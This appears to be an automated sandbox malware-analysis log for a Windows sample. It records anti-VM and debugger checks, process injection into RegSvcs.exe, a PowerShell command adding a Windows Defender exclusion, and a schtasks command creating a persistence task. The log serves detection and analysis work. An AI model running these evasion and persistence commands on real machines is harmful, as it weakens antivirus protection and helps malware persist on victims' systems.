Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: aWBoUwiux.exe PID: 5572, type: MEMORYSTR

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory allocated: 1400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory allocated: 3180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory allocated: 3030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory allocated: 9190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory allocated: A190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory allocated: A390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory allocated: B390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Memory allocated: 2900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Memory allocated: 84F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Memory allocated: 94F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Memory allocated: 96E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Memory allocated: A6E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 7593

Jump to behavior

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe TID: 4956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1960	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

8_2_00403D74

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:(iwq4iwqDD
Source: RegSvcs.exe, 00000008.00000002.2395618749.0000000001288000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_0040317B mov eax, dword ptr fs:[00000030h]

8_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00402B7C GetProcessHeap,RtlAllocateHeap,

8_2_00402B7C

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 415000	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4A0000	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C79008	Jump to behavior

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp"	Jump to behavior

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Queries volume information: C:\Users\user\Desktop\LEmJJ87mUQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
